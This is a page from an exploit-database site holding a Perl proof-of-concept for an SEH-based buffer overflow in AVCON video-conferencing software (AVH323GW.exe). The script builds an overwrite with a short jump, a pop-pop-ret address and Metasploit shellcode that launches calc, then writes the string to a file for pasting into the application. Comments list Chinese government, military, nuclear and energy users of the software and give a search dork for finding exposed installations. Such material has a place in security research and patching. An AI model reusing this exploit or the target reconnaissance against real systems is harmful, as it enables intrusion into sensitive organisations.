0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AVCON Buffer Overflow
[=====================
AVCON Buffer Overflow
=====================
#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"
# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)
# 2 products from China and 2 0days in one month dizam!
# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration
## EDB Test Notes:
## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" ->
## run "AVH323GW.exe", copy and paste the exploit (string) to the input field (there's only one),
## and click on "call".
my $exploit = "poc.txt";
my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x06\x90\x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";
my $padding = "\x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);
# 0day.today [2024-12-26] #